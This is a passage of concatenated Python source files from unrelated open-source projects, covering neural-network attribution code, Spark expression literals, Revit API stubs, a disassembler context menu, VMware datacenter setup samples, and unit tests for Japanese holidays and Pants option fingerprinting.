relevant, irrelevant = propagate_AdaptiveAvgPool2d(relevant, irrelevant, mods[31])
# scores.append((relevant.clone(), irrelevant.clone()))
# return relevant, irrelevant
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
return relevant, irrelevant
def cd_vgg_classifier(relevant, irrelevant, im_torch, model, model_type='vgg'):
# set up model
model.eval()
mods = list(model.modules())[1:]
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
# print(relevant.shape)
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[4])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[6])
# only interested in not cancer, which is class 0
#model.train()
return relevant, irrelevant
def cd_track_vgg(blob, im_torch, model, model_type='vgg'):
# set up model
model.eval()
# set up blobs
blob = torch.cuda.FloatTensor(blob)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
mods = list(model.modules())[2:]
# (0): Conv2d (3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (1): ReLU(inplace)
# (2): Conv2d (64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (3): ReLU(inplace)
# (4): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[4], model_type=model_type)
# (5): Conv2d (64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (6): ReLU(inplace)
# (7): Conv2d (128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (8): ReLU(inplace)
# (9): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[6])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[7])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[8])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[9], model_type=model_type)
# (10): Conv2d (128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (11): ReLU(inplace)
# (12): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (13): ReLU(inplace)
# (14): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (15): ReLU(inplace)
# (16): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[10])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[11])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[12])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[13])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[14])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[15])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[16], model_type=model_type)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[17])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[18])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[19])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[20])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[21])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[22])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[23], model_type=model_type)
# scores.append((relevant.clone(), irrelevant.clone()))
# (24): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (25): ReLU(inplace)
# (26): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (27): ReLU(inplace)
# (28): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (29): ReLU(inplace)
# (30): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[24])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[25])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[26])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[27])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[28])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[29])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[30], model_type=model_type)
relevant, irrelevant = propagate_AdaptiveAvgPool2d(relevant, irrelevant, mods[31])
# scores.append((relevant.clone(), irrelevant.clone()))
# return relevant, irrelevant
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
# (classifier): Sequential(
# (0): Linear(in_features=25088, out_features=4096)
# (1): ReLU(inplace)
# (2): Dropout(p=0.5)
# (3): Linear(in_features=4096, out_features=4096)
# (4): ReLU(inplace)
# (5): Dropout(p=0.5)
# (6): Linear(in_features=4096, out_features=1000)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[33])
# print(relevant.shape)
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[34])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[35])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[36])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[37])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[38])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[39])
return relevant, irrelevant
|
pysparkling/sql/expressions/literals.py | ptallada/pysparkling | 260 | 20996 | from ..utils import AnalysisException
from .expressions import Expression
class Literal(Expression):
def __init__(self, value):
super().__init__()
self.value = value
def eval(self, row, schema):
return self.value
def __str__(self):
if self.value is True:
return "true"
if self.value is False:
return "false"
if self.value is None:
return "NULL"
return str(self.value)
def get_literal_value(self):
if hasattr(self.value, "expr") or isinstance(self.value, Expression):
raise AnalysisException("Value should not be a Column or an Expression,"
f" but got {type(self)}: {self}")
return self.value
def args(self):
return (self.value, )
__all__ = ["Literal"]
|
samples/cordic/cordic_golden.py | hj424/heterocl | 236 | 21018 | <reponame>hj424/heterocl
import numpy as np
golden = np.array([
[100.0, 100.0],
[206.226840616, 179.610387213],
[1190.25124092, 1197.15702025],
[1250.76639667, 1250.3933971],
[1261.76760093, 1250.17718583],
[1237.4846285, 1237.56490579],
[1273.56730356, 1266.82141705],
[1272.899992, 1259.92589118],
[1.17000308922e-06, 1.21115462165e-06],
[4.69048419035e-08, 5.61093645301e-08],
[1.50244060584e-09, 2.44292250731e-09],
[8.47391624349e-11, 1.15593790738e-10],
[5.10649970307e-12, 4.80114236959e-12],
[8.34326950279e-13, 4.1368839091e-13],
[3.66142109259e-14, 4.95319932219e-14],
[8.20801944862e-15, 4.94154683061e-14]])
|
angrmanagement/ui/menus/disasm_insn_context_menu.py | yuzeming/angr-management | 474 | 21059 | from functools import partial
from typing import Callable
from typing import TYPE_CHECKING
from ...config import Conf
from .menu import Menu, MenuEntry, MenuSeparator
if TYPE_CHECKING:
from ...ui.views.disassembly_view import DisassemblyView
class DisasmInsnContextMenu(Menu):
"""
Dissembly Instruction's Context Menu Items and callback funcion.
It provides context menu for dissembly instructions in the Dissembly View.
For adding items in plugins, use `Workspace.add_disasm_insn_ctx_menu_entry`
and `Workspace.remove_disasm_insn_ctx_menu_entry`.
"""
def __init__(self, disasm_view: 'DisassemblyView'):
super().__init__("", parent=disasm_view)
self.insn_addr = None
self.entries.extend([
MenuEntry('T&oggle selection', self._toggle_instruction_selection),
MenuSeparator(),
MenuEntry('&XRefs...', self._popup_xrefs),
MenuSeparator(),
])
if Conf.has_operation_mango:
self.entries.extend([
MenuEntry("&Depends on...", self._popup_dependson_dialog),
MenuSeparator(),
])
self.entries.extend([
MenuEntry('E&xecute symbolically...', self._popup_newstate_dialog),
MenuEntry('&Avoid in execution...', self._avoid_in_execution),
MenuEntry('&Find in execution...', self._find_in_execution),
MenuEntry('Add &hook...', self._add_hook),
MenuEntry('View function &documentation...', self._view_docs)
])
@property
def _disasm_view(self) -> 'DisassemblyView':
return self.parent
def _popup_newstate_dialog(self):
self._disasm_view.popup_newstate_dialog(async_=True)
def _popup_dependson_dialog(self):
self._disasm_view.popup_dependson_dialog(use_operand=True)
def _toggle_instruction_selection(self):
self._disasm_view.infodock.toggle_instruction_selection(self.insn_addr)
def _avoid_in_execution(self):
self._disasm_view.avoid_addr_in_exec(self.insn_addr)
self._disasm_view.refresh()
def _find_in_execution(self):
self._disasm_view.find_addr_in_exec(self.insn_addr)
self._disasm_view.refresh()
def _add_hook(self):
self._disasm_view.popup_hook_dialog(async_=True)
def _view_docs(self):
if self._disasm_view is None:
return
addr = self._disasm_view._address_in_selection()
if addr is not None:
self._disasm_view.popup_func_doc_dialog(addr)
def _popup_xrefs(self):
if self._disasm_view is None or self._disasm_view._flow_graph is None:
return
r = self._disasm_view._flow_graph.get_selected_operand_info()
if r is not None:
_, ins_addr, operand = r
self._disasm_view.parse_operand_and_popup_xref_dialog(ins_addr, operand, async_=True)
#
# Public Methods
#
def add_menu_entry(self, text, callback: Callable[['DisasmInsnContextMenu'], None], add_separator_first=True):
if add_separator_first:
self.entries.append(MenuSeparator())
self.entries.append(MenuEntry(text, partial(callback, self)))
def remove_menu_entry(self, text, remove_preceding_separator=True):
for idx, m in enumerate(self.entries):
if not isinstance(m, MenuEntry):
continue
if m.caption == text:
self.entries.remove(m)
if remove_preceding_separator:
self.entries.pop(idx-1)
|
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/AnalyticalModelStick.py | htlcnn/ironpython-stubs | 182 | 21079 | class AnalyticalModelStick(AnalyticalModel,IDisposable):
"""
An element that represents a stick in the structural analytical model.
Could be one of beam,brace or column type.
"""
def Dispose(self):
""" Dispose(self: Element,A_0: bool) """
pass
def GetAlignmentMethod(self,selector):
"""
GetAlignmentMethod(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> AnalyticalAlignmentMethod
Gets the alignment method for a given selector.
selector: End of the analytical model.
Returns: The alignment method at a given end.
"""
pass
def getBoundingBox(self,*args):
""" getBoundingBox(self: Element,view: View) -> BoundingBoxXYZ """
pass
def GetLocalCoordinateSystem(self,*__args):
"""
GetLocalCoordinateSystem(self: AnalyticalModelStick,point: XYZ) -> Transform
Gets the local coordinate system (LCS) reflects analytical model orientation at
the specified point.
point: The point on the analytical model stick element.
Returns: Transformation matrix.
x - longitudinal axis,y - transversal,section -
horizontal,strong axis,z - transversal,section - vertical,weak axis,origin
- base point of LCS.
GetLocalCoordinateSystem(self: AnalyticalModelStick,parameter: float) -> Transform
Gets the local coordinate system (LCS) reflects analytical model orientation at
the specified parameter value along a curve.
parameter: The parameter value along a curve that should be in the range [0,1],where 0
represents start and 1 represents end of the element.
Returns: Transformation matrix.
x - longitudinal axis,y - transversal,section -
horizontal,strong axis,z - transversal,section - vertical,weak axis,origin
- base point of LCS.
"""
pass
def GetMemberForces(self):
"""
GetMemberForces(self: AnalyticalModelStick) -> IList[MemberForces]
Gets the member forces associated with this element.
Returns: Returns a collection of Member Forces associated with this element. Empty
collection will be returned if element doesn't have any Member Forces.
To
find out with which end member forces are associated use
Autodesk::Revit::DB::Structure::MemberForces::Position
property to obtain a
position of Member Forces on element.
"""
pass
def GetProjectionPlaneY(self,selector):
"""
GetProjectionPlaneY(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> ElementId
Retrieves analytical model projection information for Y direction.
selector: End of the analytical model.
Returns: Plane on to which analytical model is projected,or invalidElementId if
not
projected to a Plane.
"""
pass
def GetProjectionPlaneZ(self,selector):
"""
GetProjectionPlaneZ(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> ElementId
Retrieves analytical model projection information for Z direction.
selector: End of the analytical model.
Returns: Plane on to which analytical model is projected,or invalidElementId if
not
projected to a Plane.
"""
pass
def GetProjectionY(self,selector):
"""
GetProjectionY(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> StickElementProjectionY
Retrieves analytical model projection information for Y direction.
selector: End of the analytical model.
Returns: Indicates if the projection is a preset value,or refers to a Plane.
"""
pass
def GetProjectionZ(self,selector):
"""
GetProjectionZ(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> StickElementProjectionZ
Retrieves analytical model projection information for Z direction.
selector: End of the analytical model.
Returns: Indicates if the projection is a preset value,or refers to a Plane.
"""
pass
def GetReleases(self,start,fx,fy,fz,mx,my,mz):
"""
GetReleases(self: AnalyticalModelStick,start: bool) -> (bool,bool,bool,bool,bool,bool)
Gets the releases of element.
start: The position on analytical model stick element. True for start,false for end.
"""
pass
def GetReleaseType(self,start):
"""
GetReleaseType(self: AnalyticalModelStick,start: bool) -> ReleaseType
Gets the release type.
start: The position on analytical model stick element. True for start,false for end.
Returns: The type of release.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: Element,disposing: bool) """
pass
def RemoveAllMemberForces(self):
"""
RemoveAllMemberForces(self: AnalyticalModelStick) -> bool
Removes all member forces associated with element.
Returns: True if any member forces were removed,false otherwise.
"""
pass
def RemoveMemberForces(self,start):
"""
RemoveMemberForces(self: AnalyticalModelStick,start: bool) -> bool
Removes member forces defined for given position.
start: Member Forces position on analytical model stick element. True for start,false
for end.
Returns: True if member forces for provided position were removed,false otherwise.
"""
pass
def SetAlignmentMethod(self,selector,method):
"""
SetAlignmentMethod(self: AnalyticalModelStick,selector: AnalyticalElementSelector,method: AnalyticalAlignmentMethod)
Sets the alignment method for a given selector.
selector: End of the analytical model.
method: The alignment method at a given end.
"""
pass
def setElementType(self,*args):
""" setElementType(self: Element,type: ElementType,incompatibleExceptionMessage: str) """
pass
def SetMemberForces(self,*__args):
"""
SetMemberForces(self: AnalyticalModelStick,start: bool,force: XYZ,moment: XYZ)
Adds Member Forces to element.
start: Member Forces position on analytical model stick element. True for start,false
for end.
force: The translational forces at specified position of the element.
The x value
of XYZ object represents force along x-axis of the analytical model coordinate
system,y along y-axis,z along z-axis respectively.
moment: The rotational forces at specified position of the element.
The x value of
XYZ object represents moment about x-axis of the analytical model coordinate
system,y about y-axis,z about z-axis respectively.
SetMemberForces(self: AnalyticalModelStick,memberForces: MemberForces)
Sets Member Forces to element.
memberForces: End to which member forces will be added is defined by setting
Autodesk::Revit::DB::Structure::MemberForces::Position
property in provided
Member Forces object.
"""
pass
def SetProjection(self,selector,*__args):
"""
SetProjection(self: AnalyticalModelStick,selector: AnalyticalElementSelector,planeIdY: ElementId,projectionZ: StickElementProjectionZ)
Sets the analytical model projection to a preset value.
selector: End of the analytical model.
planeIdY: Plane on to which analytical model may be projected in Y direction.
Plane
identifies a Level,a Grid,or a Ref Plane.
projectionZ: Preset value for Analytical Model Stick projection Z.
SetProjection(self: AnalyticalModelStick,selector: AnalyticalElementSelector,projectionY: StickElementProjectionY,projectionZ: StickElementProjectionZ)
Sets the analytical model projection to a preset value.
selector: End of the analytical model.
projectionY: Preset value for Analytical Model Stick projection Y.
projectionZ: Preset value for Analytical Model Stick projection Z.
SetProjection(self: AnalyticalModelStick,selector: AnalyticalElementSelector,planeIdY: ElementId,planeIdZ: ElementId)
Sets the analytical model projection to a preset value.
selector: End of the analytical model.
planeIdY: Plane on to which analytical model may be projected in Y direction.
Plane
identifies a Level,a Grid,or a Ref Plane.
planeIdZ: Plane on to which analytical model may be projected in Z direction.
Plane
identifies a Level,a Grid,or a Ref Plane.
SetProjection(self: AnalyticalModelStick,selector: AnalyticalElementSelector,projectionY: StickElementProjectionY,planeIdZ: ElementId)
Sets the analytical model projection to a preset value.
selector: End of the analytical model.
projectionY: Preset value for Analytical Model Stick projection Y.
planeIdZ: Plane on to which analytical model may be projected in Z direction.
Plane
identifies a Level,a Grid,or a Ref Plane.
"""
pass
def SetReleases(self,start,fx,fy,fz,mx,my,mz):
"""
SetReleases(self: AnalyticalModelStick,start: bool,fx: bool,fy: bool,fz: bool,mx: bool,my: bool,mz: bool)
Sets the releases of element.
start: The position on analytical model stick element. True for start,false for end.
"""
pass
def SetReleaseType(self,start,releaseType):
"""
SetReleaseType(self: AnalyticalModelStick,start: bool,releaseType: ReleaseType)
Sets the release type.
start: The position on analytical model stick element. True for start,false for end.
releaseType: The type of release.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
|
custom/abt/reports/tests/test_fixture_utils.py | dimagilg/commcare-hq | 471 | 21090 | import doctest
from nose.tools import assert_equal, assert_true
from corehq.apps.fixtures.models import (
FieldList,
FixtureDataItem,
FixtureItemField,
)
from custom.abt.reports import fixture_utils
from custom.abt.reports.fixture_utils import (
dict_values_in,
fixture_data_item_to_dict,
)
def test_dict_values_in_param_none():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, None)
assert_true(result)
def test_dict_values_in_param_empty():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, {})
assert_true(result)
def test_dict_values_in_value_none():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, {'permutation': None})
assert_true(result)
def test_fixture_data_item_to_dict():
data_item = FixtureDataItem(
domain='test-domain',
data_type_id='123456',
fields={
'id': FieldList(
doc_type='FieldList',
field_list=[
FixtureItemField(
doc_type='FixtureItemField',
field_value='789abc',
properties={}
)
]
),
'name': FieldList(
doc_type='FieldList',
field_list=[
FixtureItemField(
doc_type='FixtureItemField',
field_value='John',
properties={'lang': 'en'}
),
FixtureItemField(
doc_type='FixtureItemField',
field_value='Jan',
properties={'lang': 'nld'}
),
FixtureItemField(
doc_type='FixtureItemField',
field_value='Jean',
properties={'lang': 'fra'}
),
]
)
}
)
dict_ = fixture_data_item_to_dict(data_item)
assert_equal(dict_, {
'id': '789abc',
'name': 'John'
})
def test_empty_fixture_data_item_to_dict():
data_item = FixtureDataItem(
domain='test-domain',
data_type_id='123456',
fields={
'id': FieldList(
doc_type='FieldList',
field_list=[]
),
'name': FieldList(
doc_type='FieldList',
field_list=[]
)
}
)
dict_ = fixture_data_item_to_dict(data_item)
assert_equal(dict_, {
'id': None,
'name': None,
})
def test_doctests():
results = doctest.testmod(fixture_utils)
assert results.failed == 0
|
cosypose/simulator/__init__.py | ompugao/cosypose | 202 | 21112 | <filename>cosypose/simulator/__init__.py
from .body import Body
from .camera import Camera
from .base_scene import BaseScene
from .caching import BodyCache, TextureCache
from .textures import apply_random_textures
|
samples/vsphere/vcenter/setup/datacenter.py | restapicoding/VMware-SDK | 589 | 21116 | <gh_stars>100-1000
"""
* *******************************************************
* Copyright (c) VMware, Inc. 2016-2018. All Rights Reserved.
* SPDX-License-Identifier: MIT
* *******************************************************
*
* DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
* EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
* WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
* NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
__author__ = 'VMware, Inc.'
from com.vmware.vcenter_client import (Datacenter, Folder)
def folder_list_datacenter_folder(context):
return context.client.vcenter.Folder.list(Folder.FilterSpec(type=Folder.Type.DATACENTER))
def detect_datacenter(context, datacenter_name):
"""Find the datacenter with the given name"""
names = set([datacenter_name])
datacenter_summaries = context.client.vcenter.Datacenter.list(
Datacenter.FilterSpec(names=names))
if len(datacenter_summaries) > 0:
datacenter = datacenter_summaries[0].datacenter
print("Detected Datacenter '{}' as {}".
format(datacenter_name, datacenter))
context.testbed.entities['DATACENTER_IDS'][datacenter_name] = datacenter
return True
else:
print("Datacenter '{}' missing".format(datacenter_name))
return False
def detect_datacenters(context):
"""Find datacenters to run the vcenter samples"""
context.testbed.entities['DATACENTER_IDS'] = {}
# Look for the two datacenters
datacenter1_name = context.testbed.config['DATACENTER1_NAME']
datacenter2_name = context.testbed.config['DATACENTER2_NAME']
return (detect_datacenter(context, datacenter1_name) and
detect_datacenter(context, datacenter2_name))
def cleanup_datacenters(context):
"""Cleanup datacenters after sample run"""
# Look for the two datacenters
datacenter1_name = context.testbed.config['DATACENTER1_NAME']
datacenter2_name = context.testbed.config['DATACENTER2_NAME']
names = set([datacenter1_name, datacenter2_name])
datacenter_summaries = context.client.vcenter.Datacenter.list(
Datacenter.FilterSpec(names=names))
print("Found {} Datacenters matching names {}".
format(len(datacenter_summaries), ", ".
join(["'{}'".format(n) for n in names])))
for datacenter_summary in datacenter_summaries:
datacenter = datacenter_summary.datacenter
print("Deleting Datacenter '{}' ({})".
format(datacenter, datacenter_summary.name))
context.client.vcenter.Datacenter.delete(datacenter, force=True)
def setup_datacenters(context):
"""Create datacenters for running vcenter samples"""
# Find a Folder in which to put the Datacenters
folder_summaries = folder_list_datacenter_folder(context)
folder = folder_summaries[0].folder
print("Creating datacenters in Folder '{}' ({})".
format(folder, folder_summaries[0].name))
# Create first datacenter
datacenter1_name = context.testbed.config['DATACENTER1_NAME']
datacenter1 = context.client.vcenter.Datacenter.create(
Datacenter.CreateSpec(name=datacenter1_name, folder=folder)
)
print("Created Datacenter '{}' ({})".format(datacenter1, datacenter1_name))
# Create second datacenter
datacenter2_name = context.testbed.config['DATACENTER2_NAME']
datacenter2 = context.client.vcenter.Datacenter.create(
Datacenter.CreateSpec(name=datacenter2_name, folder=folder)
)
print("Created Datacenter '{}' ({})".format(datacenter2, datacenter2_name))
# Save datacenter name to identifier mappings for later use
context.testbed.entities['DATACENTER_IDS'] = {
datacenter1_name: datacenter1,
datacenter2_name: datacenter2
}
def cleanup(context):
cleanup_datacenters(context)
def setup(context):
setup_datacenters(context)
def validate(context):
return detect_datacenters(context)
|
tests/test_year_2018.py | l0pht511/jpholiday | 179 | 21148 | <filename>tests/test_year_2018.py
# coding: utf-8
import datetime
import unittest
import jpholiday
class TestYear2018(unittest.TestCase):
def test_holiday(self):
"""
2018年祝日
"""
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 1, 1)), '元日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 1, 8)), '成人の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 2, 11)), '建国記念の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 2, 12)), '建国記念の日 振替休日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 3, 21)), '春分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 4, 29)), '昭和の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 4, 30)), '昭和の日 振替休日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 5, 3)), '憲法記念日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 5, 4)), 'みどりの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 5, 5)), 'こどもの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 7, 16)), '海の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 8, 11)), '山の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 9, 17)), '敬老の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 9, 23)), '秋分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 9, 24)), '秋分の日 振替休日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 10, 8)), '体育の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 11, 3)), '文化の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 11, 23)), '勤労感謝の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 12, 23)), '天皇誕生日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 12, 24)), '天皇誕生日 振替休日')
def test_count_month(self):
"""
2018年月祝日数
"""
self.assertEqual(len(jpholiday.month_holidays(2018, 1)), 2)
self.assertEqual(len(jpholiday.month_holidays(2018, 2)), 2)
self.assertEqual(len(jpholiday.month_holidays(2018, 3)), 1)
self.assertEqual(len(jpholiday.month_holidays(2018, 4)), 2)
self.assertEqual(len(jpholiday.month_holidays(2018, 5)), 3)
self.assertEqual(len(jpholiday.month_holidays(2018, 6)), 0)
self.assertEqual(len(jpholiday.month_holidays(2018, 7)), 1)
self.assertEqual(len(jpholiday.month_holidays(2018, 8)), 1)
self.assertEqual(len(jpholiday.month_holidays(2018, 9)), 3)
self.assertEqual(len(jpholiday.month_holidays(2018, 10)), 1)
self.assertEqual(len(jpholiday.month_holidays(2018, 11)), 2)
self.assertEqual(len(jpholiday.month_holidays(2018, 12)), 2)
def test_count_year(self):
"""
2018年祝日数
"""
self.assertEqual(len(jpholiday.year_holidays(2018)), 20)
|
src/python/pants/option/options_fingerprinter_test.py | bastianwegge/pants | 1,806 | 21158 | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pathlib import Path
import pytest
from pants.option.custom_types import (
DictValueComponent,
ListValueComponent,
UnsetBool,
dict_with_files_option,
dir_option,
file_option,
)
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner()
def test_fingerprint_dict() -> None:
d1 = {"b": 1, "a": 2}
d2 = {"a": 2, "b": 1}
d3 = {"a": 1, "b": 2}
fp1, fp2, fp3 = (
OptionsFingerprinter().fingerprint(DictValueComponent.create, d) for d in (d1, d2, d3)
)
assert fp1 == fp2
assert fp1 != fp3
def test_fingerprint_dict_with_non_string_keys() -> None:
d = {("a", 2): (3, 4)}
fp = OptionsFingerprinter().fingerprint(DictValueComponent.create, d)
assert fp == "3852a094612ce1c22c08ee2ddcdc03d09e87ad97"
def test_fingerprint_list() -> None:
l1 = [1, 2, 3]
l2 = [1, 3, 2]
fp1, fp2 = (OptionsFingerprinter().fingerprint(ListValueComponent.create, l) for l in (l1, l2))
assert fp1 != fp2
def test_fingerprint_file(rule_runner: RuleRunner) -> None:
fp1, fp2, fp3 = (
OptionsFingerprinter().fingerprint(file_option, rule_runner.write_files({f: c})[0])
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
("spam/egg.config", "blah blah blah"),
)
)
assert fp1 != fp2
assert fp1 != fp3
assert fp2 != fp3
def test_fingerprint_file_outside_buildroot(tmp_path: Path, rule_runner: RuleRunner) -> None:
outside_buildroot = rule_runner.write_files({(tmp_path / "foobar").as_posix(): "foobar"})[0]
with pytest.raises(ValueError):
OptionsFingerprinter().fingerprint(file_option, outside_buildroot)
def test_fingerprint_file_list(rule_runner: RuleRunner) -> None:
f1, f2, f3 = (
rule_runner.write_files({f: c})[0]
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
("spam/egg.config", "blah blah blah"),
)
)
fp1 = OptionsFingerprinter().fingerprint(file_option, [f1, f2])
fp2 = OptionsFingerprinter().fingerprint(file_option, [f2, f1])
fp3 = OptionsFingerprinter().fingerprint(file_option, [f1, f3])
assert fp1 == fp2
assert fp1 != fp3
def test_fingerprint_primitive() -> None:
fp1, fp2 = (OptionsFingerprinter().fingerprint("", v) for v in ("foo", 5))
assert fp1 != fp2
def test_fingerprint_unset_bool() -> None:
fp1 = OptionsFingerprinter().fingerprint(UnsetBool, UnsetBool)
fp2 = OptionsFingerprinter().fingerprint(UnsetBool, UnsetBool)
assert fp1 == fp2
def test_fingerprint_dir(rule_runner: RuleRunner) -> None:
d1 = rule_runner.create_dir("a")
d2 = rule_runner.create_dir("b")
d3 = rule_runner.create_dir("c")
rule_runner.write_files(
{
"a/bar/bar.config": "blah blah blah",
"a/foo/foo.config": "meow meow meow",
"b/foo/foo.config": "meow meow meow",
"b/bar/bar.config": "blah blah blah",
"c/bar/bar.config": "blah meow blah",
}
)
dp1 = OptionsFingerprinter().fingerprint(dir_option, [d1])
dp2 = OptionsFingerprinter().fingerprint(dir_option, [d1, d2])
dp3 = OptionsFingerprinter().fingerprint(dir_option, [d2, d1])
dp4 = OptionsFingerprinter().fingerprint(dir_option, [d3])
assert dp1 == dp1
assert dp2 == dp2
assert dp1 != dp3
assert dp1 != dp4
assert dp2 != dp3
def test_fingerprint_dict_with_files_order(rule_runner: RuleRunner) -> None:
f1, f2 = (
rule_runner.write_files({f: c})[0]
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
)
)
fp1 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
fp2 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f2},{f1}"})
assert fp1 == fp2
def test_fingerprint_dict_with_file_content_change(rule_runner: RuleRunner) -> None:
f1, f2 = (
rule_runner.write_files({f: c})[0]
